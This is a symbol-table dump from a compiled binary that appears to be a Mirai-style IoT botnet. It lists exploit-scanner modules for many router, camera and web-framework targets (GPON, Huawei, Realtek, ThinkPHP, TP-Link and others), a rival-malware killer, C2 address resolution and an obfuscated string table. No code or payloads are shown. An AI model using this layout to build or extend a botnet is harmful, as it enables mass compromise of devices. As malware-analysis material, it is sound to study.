fork	.symtab	0x417ba8	572	FUNC	<unknown>	DEFAULT	2
fork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fork_handler_pool	.symtab	0x430870	1348	OBJECT	<unknown>	DEFAULT	12
fputs_unlocked	.symtab	0x415228	68	FUNC	<unknown>	DEFAULT	2
fputs_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
frame_dummy	.symtab	0x400160	0	FUNC	<unknown>	DEFAULT	2
free	.symtab	0x416f14	384	FUNC	<unknown>	DEFAULT	2
free.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseek	.symtab	0x41b964	28	FUNC	<unknown>	DEFAULT	2
fseeko	.symtab	0x41b964	28	FUNC	<unknown>	DEFAULT	2
fseeko.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fseeko64	.symtab	0x41b980	316	FUNC	<unknown>	DEFAULT	2
fseeko64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fstat	.symtab	0x418e6c	96	FUNC	<unknown>	DEFAULT	2
fstat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
fwrite_unlocked	.symtab	0x41526c	168	FUNC	<unknown>	DEFAULT	2
fwrite_unlocked.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getc	.symtab	0x41a5b8	212	FUNC	<unknown>	DEFAULT	2
getc_unlocked	.symtab	0x41aac8	216	FUNC	<unknown>	DEFAULT	2
getdents.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdents64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getdtablesize	.symtab	0x418f7c	52	FUNC	<unknown>	DEFAULT	2
getdtablesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getegid	.symtab	0x418fb0	18	FUNC	<unknown>	DEFAULT	2
getegid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
geteuid	.symtab	0x418fc2	18	FUNC	<unknown>	DEFAULT	2
geteuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getgid	.symtab	0x418fd4	18	FUNC	<unknown>	DEFAULT	2
getgid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpagesize	.symtab	0x418fe8	28	FUNC	<unknown>	DEFAULT	2
getpagesize.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getpid	.symtab	0x417de4	52	FUNC	<unknown>	DEFAULT	2
getpid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getppid	.symtab	0x413c98	16	FUNC	<unknown>	DEFAULT	2
getppid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getrlimit	.symtab	0x419004	64	FUNC	<unknown>	DEFAULT	2
getrlimit.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockname	.symtab	0x415df4	64	FUNC	<unknown>	DEFAULT	2
getsockname.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getsockopt	.symtab	0x415e34	68	FUNC	<unknown>	DEFAULT	2
getsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
getuid	.symtab	0x419044	18	FUNC	<unknown>	DEFAULT	2
getuid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon443.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon443_fake_time	.symtab	0x430570	4	OBJECT	<unknown>	DEFAULT	12
gpon443_init	.symtab	0x407300	2812	FUNC	<unknown>	DEFAULT	2
gpon443_init_pid	.symtab	0x430540	4	OBJECT	<unknown>	DEFAULT	12
gpon443_init_rawpkt	.symtab	0x430548	40	OBJECT	<unknown>	DEFAULT	12
gpon443_ranges	.symtab	0x4301bc	44	OBJECT	<unknown>	DEFAULT	10
gpon443_rsck	.symtab	0x430544	4	OBJECT	<unknown>	DEFAULT	12
gpon443_setup_connection	.symtab	0x407240	188	FUNC	<unknown>	DEFAULT	2
gpon80.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
gpon80_fake_time	.symtab	0x4305a4	4	OBJECT	<unknown>	DEFAULT	12
gpon80_init	.symtab	0x407ec0	2748	FUNC	<unknown>	DEFAULT	2
gpon80_init_pid	.symtab	0x430574	4	OBJECT	<unknown>	DEFAULT	12
gpon80_init_rawpkt	.symtab	0x43057c	40	OBJECT	<unknown>	DEFAULT	12
gpon80_rsck	.symtab	0x430578	4	OBJECT	<unknown>	DEFAULT	12
gpon80_setup_connection	.symtab	0x407e00	188	FUNC	<unknown>	DEFAULT	2
h_errno	.symtab	0x4	4	TLS	<unknown>	DEFAULT	6
hexPayload	.symtab	0x430194	4	OBJECT	<unknown>	DEFAULT	10
hnap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
hnap_init	.symtab	0x408a40	2496	FUNC	<unknown>	DEFAULT	2
hnapscanner_fake_time	.symtab	0x4305d8	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_rsck	.symtab	0x4305ac	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_scanner_pid	.symtab	0x4305a8	4	OBJECT	<unknown>	DEFAULT	12
hnapscanner_scanner_rawpkt	.symtab	0x4305b0	40	OBJECT	<unknown>	DEFAULT	12
hnapscanner_setup_connection	.symtab	0x408980	188	FUNC	<unknown>	DEFAULT	2
httpd.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
httpd_pid	.symtab	0x4301e8	4	OBJECT	<unknown>	DEFAULT	10
httpd_port	.symtab	0x430684	4	OBJECT	<unknown>	DEFAULT	12
httpd_serve	.symtab	0x409460	472	FUNC	<unknown>	DEFAULT	2
httpd_start	.symtab	0x409640	456	FUNC	<unknown>	DEFAULT	2
httpd_started	.symtab	0x430688	4	OBJECT	<unknown>	DEFAULT	12
huawei.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
huawei_fake_time	.symtab	0x43060c	4	OBJECT	<unknown>	DEFAULT	12
huawei_init	.symtab	0x4098e0	2780	FUNC	<unknown>	DEFAULT	2
huawei_rsck	.symtab	0x4305e0	4	OBJECT	<unknown>	DEFAULT	12
huawei_scanner_pid	.symtab	0x4305dc	4	OBJECT	<unknown>	DEFAULT	12
huawei_scanner_rawpkt	.symtab	0x4305e4	40	OBJECT	<unknown>	DEFAULT	12
huawei_setup_connection	.symtab	0x409820	188	FUNC	<unknown>	DEFAULT	2
id_buf	.symtab	0x433368	32	OBJECT	<unknown>	DEFAULT	12
index	.symtab	0x41ad68	196	FUNC	<unknown>	DEFAULT	2
inet_addr	.symtab	0x415c20	44	FUNC	<unknown>	DEFAULT	2
inet_aton	.symtab	0x41b114	200	FUNC	<unknown>	DEFAULT	2
inet_aton.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
inet_makeaddr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
init_static_tls	.symtab	0x41b3e0	64	FUNC	<unknown>	DEFAULT	2
initstate	.symtab	0x417264	120	FUNC	<unknown>	DEFAULT	2
initstate_r	.symtab	0x417474	204	FUNC	<unknown>	DEFAULT	2
intr	.symtab	0x430dc8	20	OBJECT	<unknown>	DEFAULT	12
ioctl	.symtab	0x41b744	268	FUNC	<unknown>	DEFAULT	2
ioctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
isatty	.symtab	0x41b07c	36	FUNC	<unknown>	DEFAULT	2
isatty.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
jaws.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
jaws_fake_time	.symtab	0x430640	4	OBJECT	<unknown>	DEFAULT	12
jaws_init	.symtab	0x40a480	2496	FUNC	<unknown>	DEFAULT	2
jaws_init_pid	.symtab	0x430610	4	OBJECT	<unknown>	DEFAULT	12
jaws_init_rawpkt	.symtab	0x430618	40	OBJECT	<unknown>	DEFAULT	12
jaws_rsck	.symtab	0x430614	4	OBJECT	<unknown>	DEFAULT	12
jaws_setup_connection	.symtab	0x40a3c0	188	FUNC	<unknown>	DEFAULT	2
kill	.symtab	0x413ca8	60	FUNC	<unknown>	DEFAULT	2
kill.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
killer_init	.symtab	0x40afc0	292	FUNC	<unknown>	DEFAULT	2
killer_kill	.symtab	0x40ae40	48	FUNC	<unknown>	DEFAULT	2
killer_mirai_exists	.symtab	0x40ae80	320	FUNC	<unknown>	DEFAULT	2
killer_pid	.symtab	0x430644	4	OBJECT	<unknown>	DEFAULT	12
lblink_fake_time	.symtab	0x4304d0	4	OBJECT	<unknown>	DEFAULT	12
lblink_init	.symtab	0x404d60	2876	FUNC	<unknown>	DEFAULT	2
lblink_rsck	.symtab	0x4304a4	4	OBJECT	<unknown>	DEFAULT	12
lblink_scanner_pid	.symtab	0x4304a0	4	OBJECT	<unknown>	DEFAULT	12
lblink_scanner_rawpkt	.symtab	0x4304a8	40	OBJECT	<unknown>	DEFAULT	12
lblink_setup_connection	.symtab	0x404ca0	188	FUNC	<unknown>	DEFAULT	2
libc-cancellation.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
libc-tls.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
linksys.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
linksys_fake_time	.symtab	0x430678	4	OBJECT	<unknown>	DEFAULT	12
linksys_init	.symtab	0x40b1c0	2496	FUNC	<unknown>	DEFAULT	2
linksys_rsck	.symtab	0x43064c	4	OBJECT	<unknown>	DEFAULT	12
linksys_scanner_pid	.symtab	0x430648	4	OBJECT	<unknown>	DEFAULT	12
linksys_scanner_rawpkt	.symtab	0x430650	40	OBJECT	<unknown>	DEFAULT	12
linksys_setup_connection	.symtab	0x40b100	188	FUNC	<unknown>	DEFAULT	2
listen	.symtab	0x415e78	64	FUNC	<unknown>	DEFAULT	2
listen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
llseek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
lock	.symtab	0x430df4	4	OBJECT	<unknown>	DEFAULT	12
lockdown	.symtab	0x433364	4	OBJECT	<unknown>	DEFAULT	12
lseek64	.symtab	0x41be48	108	FUNC	<unknown>	DEFAULT	2
main	.symtab	0x40bd40	2596	FUNC	<unknown>	DEFAULT	2
main.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
main_pid	.symtab	0x43338c	4	OBJECT	<unknown>	DEFAULT	12
malloc	.symtab	0x4162d4	1732	FUNC	<unknown>	DEFAULT	2
malloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
malloc_trim	.symtab	0x417094	52	FUNC	<unknown>	DEFAULT	2
memchr	.symtab	0x41ac80	24	FUNC	<unknown>	DEFAULT	2
memcpy	.symtab	0x415480	860	FUNC	<unknown>	DEFAULT	2
memmove	.symtab	0x4158c0	188	FUNC	<unknown>	DEFAULT	2
memmove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mempcpy	.symtab	0x41bd80	36	FUNC	<unknown>	DEFAULT	2
mempcpy.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memrchr	.symtab	0x41aca0	200	FUNC	<unknown>	DEFAULT	2
memrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
memset	.symtab	0x415820	150	FUNC	<unknown>	DEFAULT	2
methods	.symtab	0x43047c	4	OBJECT	<unknown>	DEFAULT	12
methods_len	.symtab	0x430478	1	OBJECT	<unknown>	DEFAULT	12
mmap	.symtab	0x418d24	64	FUNC	<unknown>	DEFAULT	2
mmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mremap	.symtab	0x419058	68	FUNC	<unknown>	DEFAULT	2
mremap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
munmap	.symtab	0x41909c	60	FUNC	<unknown>	DEFAULT	2
munmap.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
mylock	.symtab	0x43023c	24	OBJECT	<unknown>	DEFAULT	10
mylock	.symtab	0x430254	24	OBJECT	<unknown>	DEFAULT	10
nanosleep	.symtab	0x419118	108	FUNC	<unknown>	DEFAULT	2
nanosleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
netlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
netlink_fake_time	.symtab	0x4306c4	4	OBJECT	<unknown>	DEFAULT	12
netlink_init	.symtab	0x40c840	3108	FUNC	<unknown>	DEFAULT	2
netlink_init_pid	.symtab	0x430694	4	OBJECT	<unknown>	DEFAULT	12
netlink_init_rawpkt	.symtab	0x43069c	40	OBJECT	<unknown>	DEFAULT	12
netlink_range	.symtab	0x4301f8	36	OBJECT	<unknown>	DEFAULT	10
netlink_rsck	.symtab	0x430698	4	OBJECT	<unknown>	DEFAULT	12
netlink_setup_connection	.symtab	0x40c780	188	FUNC	<unknown>	DEFAULT	2
next_start.1251	.symtab	0x430860	4	OBJECT	<unknown>	DEFAULT	12
nprocessors_onln	.symtab	0x417698	264	FUNC	<unknown>	DEFAULT	2
nuuo.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
nuuo_fake_time	.symtab	0x4306f8	4	OBJECT	<unknown>	DEFAULT	12
nuuo_init	.symtab	0x40d540	2788	FUNC	<unknown>	DEFAULT	2
nuuo_rsck	.symtab	0x4306cc	4	OBJECT	<unknown>	DEFAULT	12
nuuo_scanner_pid	.symtab	0x4306c8	4	OBJECT	<unknown>	DEFAULT	12
nuuo_scanner_rawpkt	.symtab	0x4306d0	40	OBJECT	<unknown>	DEFAULT	12
nuuo_setup_connection	.symtab	0x40d480	188	FUNC	<unknown>	DEFAULT	2
object.4732	.symtab	0x43042c	24	OBJECT	<unknown>	DEFAULT	12
open	.symtab	0x4180c0	172	FUNC	<unknown>	DEFAULT	2
opendir	.symtab	0x414104	176	FUNC	<unknown>	DEFAULT	2
opendir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
p.4718	.symtab	0x430190	0	OBJECT	<unknown>	DEFAULT	10
parse_config.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
parse_request	.symtab	0x409400	96	FUNC	<unknown>	DEFAULT	2
pending_connection	.symtab	0x43068c	1	OBJECT	<unknown>	DEFAULT	12
pgid	.symtab	0x430690	4	OBJECT	<unknown>	DEFAULT	12
prctl	.symtab	0x413ce4	68	FUNC	<unknown>	DEFAULT	2
prctl.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
prefix.6143	.symtab	0x41f0c8	12	OBJECT	<unknown>	DEFAULT	4
program_invocation_name	.symtab	0x430320	4	OBJECT	<unknown>	DEFAULT	10
program_invocation_short_name	.symtab	0x43031c	4	OBJECT	<unknown>	DEFAULT	10
qual_chars.6152	.symtab	0x41f0dc	20	OBJECT	<unknown>	DEFAULT	4
quit	.symtab	0x430ddc	20	OBJECT	<unknown>	DEFAULT	12
raise	.symtab	0x417e18	116	FUNC	<unknown>	DEFAULT	2
raise.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand	.symtab	0x417180	20	FUNC	<unknown>	DEFAULT	2
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
rand_alphastr	.symtab	0x40e100	276	FUNC	<unknown>	DEFAULT	2
rand_init	.symtab	0x40e0a0	96	FUNC	<unknown>	DEFAULT	2
rand_next	.symtab	0x40e040	68	FUNC	<unknown>	DEFAULT	2
rand_str	.symtab	0x40e220	252	FUNC	<unknown>	DEFAULT	2
random	.symtab	0x417194	100	FUNC	<unknown>	DEFAULT	2
random.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
random_poly_info	.symtab	0x41fccc	40	OBJECT	<unknown>	DEFAULT	4
random_r	.symtab	0x41733c	108	FUNC	<unknown>	DEFAULT	2
random_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
randtbl	.symtab	0x430280	128	OBJECT	<unknown>	DEFAULT	10
rawmemchr	.symtab	0x41bda4	164	FUNC	<unknown>	DEFAULT	2
rawmemchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
read	.symtab	0x4182c0	172	FUNC	<unknown>	DEFAULT	2
readdir	.symtab	0x414254	148	FUNC	<unknown>	DEFAULT	2
readdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readdir64	.symtab	0x419280	152	FUNC	<unknown>	DEFAULT	2
readdir64.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
readlink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realloc	.symtab	0x416a7c	692	FUNC	<unknown>	DEFAULT	2
realloc.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realtek.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
realtek_init	.symtab	0x40e3e0	2564	FUNC	<unknown>	DEFAULT	2
realtekscanner_fake_time	.symtab	0x430740	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_rsck	.symtab	0x430714	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_scanner_pid	.symtab	0x430710	4	OBJECT	<unknown>	DEFAULT	12
realtekscanner_scanner_rawpkt	.symtab	0x430718	40	OBJECT	<unknown>	DEFAULT	12
realtekscanner_setup_connection	.symtab	0x40e320	188	FUNC	<unknown>	DEFAULT	2
recv	.symtab	0x415ef8	128	FUNC	<unknown>	DEFAULT	2
recv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
recvfrom	.symtab	0x415fbc	144	FUNC	<unknown>	DEFAULT	2
recvfrom.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
register-atfork.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
remove	.symtab	0x41434c	124	FUNC	<unknown>	DEFAULT	2
remove.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
resolv_entries_free	.symtab	0x40ee00	80	FUNC	<unknown>	DEFAULT	2
resolv_lookup	.symtab	0x40ee60	1228	FUNC	<unknown>	DEFAULT	2
resolve_cnc_addr	.symtab	0x40bb80	180	FUNC	<unknown>	DEFAULT	2
resolve_func	.symtab	0x4301f4	4	OBJECT	<unknown>	DEFAULT	10
rindex	.symtab	0x41af58	80	FUNC	<unknown>	DEFAULT	2
rmdir	.symtab	0x419184	60	FUNC	<unknown>	DEFAULT	2
rmdir.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sa_refcntr	.symtab	0x430df0	4	OBJECT	<unknown>	DEFAULT	12
sbrk	.symtab	0x418d64	104	FUNC	<unknown>	DEFAULT	2
sbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
scanner_init	.symtab	0x40bc40	236	FUNC	<unknown>	DEFAULT	2
select	.symtab	0x413d6c	136	FUNC	<unknown>	DEFAULT	2
select.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
send	.symtab	0x41608c	128	FUNC	<unknown>	DEFAULT	2
send.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sendto	.symtab	0x416150	144	FUNC	<unknown>	DEFAULT	2
sendto.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setjmp	.symtab	0x418de0	4	FUNC	<unknown>	DEFAULT	2
setsid	.symtab	0x413df4	60	FUNC	<unknown>	DEFAULT	2
setsid.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setsockopt	.symtab	0x4161e0	68	FUNC	<unknown>	DEFAULT	2
setsockopt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
setstate	.symtab	0x4171f8	108	FUNC	<unknown>	DEFAULT	2
setstate_r	.symtab	0x417540	228	FUNC	<unknown>	DEFAULT	2
sigaction	.symtab	0x41b1dc	20	FUNC	<unknown>	DEFAULT	2
sigaction.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigjmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sigprocmask	.symtab	0x4191c0	116	FUNC	<unknown>	DEFAULT	2
sigprocmask.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sleep	.symtab	0x417e8c	224	FUNC	<unknown>	DEFAULT	2
sleep.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
socket	.symtab	0x416224	64	FUNC	<unknown>	DEFAULT	2
socket.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
spec_and_mask.6151	.symtab	0x41f0f0	16	OBJECT	<unknown>	DEFAULT	4
spec_base.6142	.symtab	0x41f0d4	7	OBJECT	<unknown>	DEFAULT	4
spec_chars.6148	.symtab	0x41f140	21	OBJECT	<unknown>	DEFAULT	4
spec_flags.6147	.symtab	0x41f158	8	OBJECT	<unknown>	DEFAULT	4
spec_or_mask.6150	.symtab	0x41f100	16	OBJECT	<unknown>	DEFAULT	4
spec_ranges.6149	.symtab	0x41f110	9	OBJECT	<unknown>	DEFAULT	4
sprintf	.symtab	0x4143c8	132	FUNC	<unknown>	DEFAULT	2
sprintf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
srand	.symtab	0x4172dc	96	FUNC	<unknown>	DEFAULT	2
srandom	.symtab	0x4172dc	96	FUNC	<unknown>	DEFAULT	2
srandom_r	.symtab	0x4173a8	204	FUNC	<unknown>	DEFAULT	2
srv_addr	.symtab	0x433390	16	OBJECT	<unknown>	DEFAULT	12
stat	.symtab	0x413e30	96	FUNC	<unknown>	DEFAULT	2
stat.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
static_dtv	.symtab	0x432e18	512	OBJECT	<unknown>	DEFAULT	12
static_map	.symtab	0x433320	52	OBJECT	<unknown>	DEFAULT	12
static_slotinfo	.symtab	0x433018	776	OBJECT	<unknown>	DEFAULT	12
stderr	.symtab	0x430334	4	OBJECT	<unknown>	DEFAULT	10
stdin	.symtab	0x43032c	4	OBJECT	<unknown>	DEFAULT	10
stdout	.symtab	0x430330	4	OBJECT	<unknown>	DEFAULT	10
strchr	.symtab	0x41ad68	196	FUNC	<unknown>	DEFAULT	2
strchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strchrnul	.symtab	0x41ae2c	192	FUNC	<unknown>	DEFAULT	2
strchrnul.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcmp	.symtab	0x41aeec	34	FUNC	<unknown>	DEFAULT	2
strcmp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strcoll	.symtab	0x41aeec	34	FUNC	<unknown>	DEFAULT	2
strcspn	.symtab	0x41af10	72	FUNC	<unknown>	DEFAULT	2
strcspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strdup	.symtab	0x415bbc	76	FUNC	<unknown>	DEFAULT	2
strdup.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strerror_r	.symtab	0x415adc	224	FUNC	<unknown>	DEFAULT	2
strlen	.symtab	0x415360	88	FUNC	<unknown>	DEFAULT	2
strnlen	.symtab	0x41597c	136	FUNC	<unknown>	DEFAULT	2
strnlen.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strpbrk	.symtab	0x41b050	44	FUNC	<unknown>	DEFAULT	2
strpbrk.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strrchr	.symtab	0x41af58	80	FUNC	<unknown>	DEFAULT	2
strrchr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strspn	.symtab	0x41afa8	48	FUNC	<unknown>	DEFAULT	2
strspn.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strstr	.symtab	0x415a04	182	FUNC	<unknown>	DEFAULT	2
strstr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok	.symtab	0x415c08	24	FUNC	<unknown>	DEFAULT	2
strtok.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
strtok_r	.symtab	0x41afd8	120	FUNC	<unknown>	DEFAULT	2
strtok_r.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
sysconf	.symtab	0x4177a0	1032	FUNC	<unknown>	DEFAULT	2
sysconf.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
system	.symtab	0x418cac	120	FUNC	<unknown>	DEFAULT	2
system.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table	.symtab	0x4333a0	56	OBJECT	<unknown>	DEFAULT	12
table.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
table_init	.symtab	0x40f480	208	FUNC	<unknown>	DEFAULT	2
table_key	.symtab	0x43021c	4	OBJECT	<unknown>	DEFAULT	10
table_lock_val	.symtab	0x40f380	120	FUNC	<unknown>	DEFAULT	2
table_retrieve_val	.symtab	0x40f340	36	FUNC	<unknown>	DEFAULT	2
table_unlock_val	.symtab	0x40f400	120	FUNC	<unknown>	DEFAULT	2
tcgetattr	.symtab	0x41b0a0	116	FUNC	<unknown>	DEFAULT	2
tcgetattr.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tcp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
thinkphp.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
thinkphp_fake_time	.symtab	0x430774	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_init	.symtab	0x40f620	2784	FUNC	<unknown>	DEFAULT	2
thinkphp_init_pid	.symtab	0x430744	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_init_rawpkt	.symtab	0x43074c	40	OBJECT	<unknown>	DEFAULT	12
thinkphp_rsck	.symtab	0x430748	4	OBJECT	<unknown>	DEFAULT	12
thinkphp_setup_connection	.symtab	0x40f560	188	FUNC	<unknown>	DEFAULT	2
time	.symtab	0x413e90	16	FUNC	<unknown>	DEFAULT	2
time.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
times	.symtab	0x419234	16	FUNC	<unknown>	DEFAULT	2
times.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
totolink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
totolink_fake_time	.symtab	0x4307a8	4	OBJECT	<unknown>	DEFAULT	12
totolink_init	.symtab	0x4101c0	2872	FUNC	<unknown>	DEFAULT	2
totolink_rsck	.symtab	0x43077c	4	OBJECT	<unknown>	DEFAULT	12
totolink_scanner_pid	.symtab	0x430778	4	OBJECT	<unknown>	DEFAULT	12
totolink_scanner_rawpkt	.symtab	0x430780	40	OBJECT	<unknown>	DEFAULT	12
totolink_setup_connection	.symtab	0x410100	188	FUNC	<unknown>	DEFAULT	2
tplink.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tplink_fake_time	.symtab	0x4307e0	4	OBJECT	<unknown>	DEFAULT	12
tplink_init	.symtab	0x410dc0	2872	FUNC	<unknown>	DEFAULT	2
tplink_rsck	.symtab	0x4307b4	4	OBJECT	<unknown>	DEFAULT	12
tplink_scanner_pid	.symtab	0x4307b0	4	OBJECT	<unknown>	DEFAULT	12
tplink_scanner_rawpkt	.symtab	0x4307b8	40	OBJECT	<unknown>	DEFAULT	12
tplink_setup_connection	.symtab	0x410d00	188	FUNC	<unknown>	DEFAULT	2
tr064.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tr064_fake_time	.symtab	0x430818	4	OBJECT	<unknown>	DEFAULT	12
tr064_init	.symtab	0x4119c0	2568	FUNC	<unknown>	DEFAULT	2
tr064_rsck	.symtab	0x4307ec	4	OBJECT	<unknown>	DEFAULT	12
tr064_scanner_pid	.symtab	0x4307e8	4	OBJECT	<unknown>	DEFAULT	12
tr064_scanner_rawpkt	.symtab	0x4307f0	40	OBJECT	<unknown>	DEFAULT	12
tr064_setup_connection	.symtab	0x411900	188	FUNC	<unknown>	DEFAULT	2
tvt.c	.symtab	0x0	0	FILE	<unknown>	DEFAULT	SHN_ABS
tvt_fake_time	.symtab	0x43084c	4	OBJECT	<unknown>	DEFAULT	12
tvt_init	.symtab	0x4124a0	2996	FUNC	<unknown>	DEFAULT	2
tvt_rsck	.symtab	0x430820	4	OBJECT	<unknown>	DEFAULT	12
tvt_scanner_pid	.symtab	0x43081c	4	OBJECT	<unknown>	DEFAULT	12
tvt_scanner_rawpkt	.symtab	0x430824	40	OBJECT	<unknown>	DEFAULT	12
tvt_setup_connection	.symtab	0x4123e0	188	FUNC	<unknown>	DEFAULT	2
type_codes	.symtab	0x41f11a	24	OBJECT	<unknown>	DEFAULT	4
type_sizes	.symtab	0x41f134	12	OBJECT	<unknown>	DEFAULT	4
